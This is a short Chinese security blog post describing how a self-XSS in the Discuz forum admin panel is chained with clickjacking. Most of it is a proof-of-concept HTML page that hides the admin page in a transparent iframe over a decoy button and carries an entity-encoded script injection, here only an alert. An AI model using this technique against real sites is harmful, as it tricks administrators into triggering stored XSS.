Self XSS + Click Jacking ==> 存储型 XSS http://hi.baidu.com/hacklele/admin.php?frames=yes&action=moderate&operation=threads,页面内有个隐藏表单”title”,可以GET 提交,管理点击『提交』后触发。 由于是一个 Self XSS,不好利用,而 Discuz 后台是可以通过 iframe 标签引用的,导致我们可以结合 Click Jacking(点击劫持)加以利用。
<html>
<head>
<title>Dz XSS Demo</title>
<style type="text/css">
#click{
height: 25px;
width: 60px;
top: 710px;
left: 220px;
position: absolute;
z-index: 1;
}
#hidden{
height: 500px;
width: 500px;
top: 320px;
left: 45px;
filter: alpha(opacity=0);
opacity: 0;
position: absolute;
z-index: 2
}
</style>
</head>
<body>
<img src="girl.jpg">
<button id="click">下一页</button>
<iframe id="hidden" src="https://hi.baidu.com/hacklele/admin.php?frames=yes&action=moderate&operation=threads&title=%26%23x27%26%23x29%26%23x22%26%23x29%26%23x3b%26%23x61%26%23x6c%26%23x65%26%23x72%26%23x74%26%23x28%26%23x64%26%23x6f%26%23x63%26%23x75%26%23x6d%26%23x65%26%23x6e%26%23x74%26%23x2e%26%23x64%26%23x6f%26%23x6d%26%23x61%26%23x69%26%23x6e%26%23x29%26%23x3b%26%23x2f%26%23x2f"></iframe>
</body>
|
-
上一篇: 看我如何拿下百度杯 - 网站安全 - 自学php
下一篇: 打掉安卓手机木马的老窝 - 网站安全 - 自学php
还没有人抢沙发呢~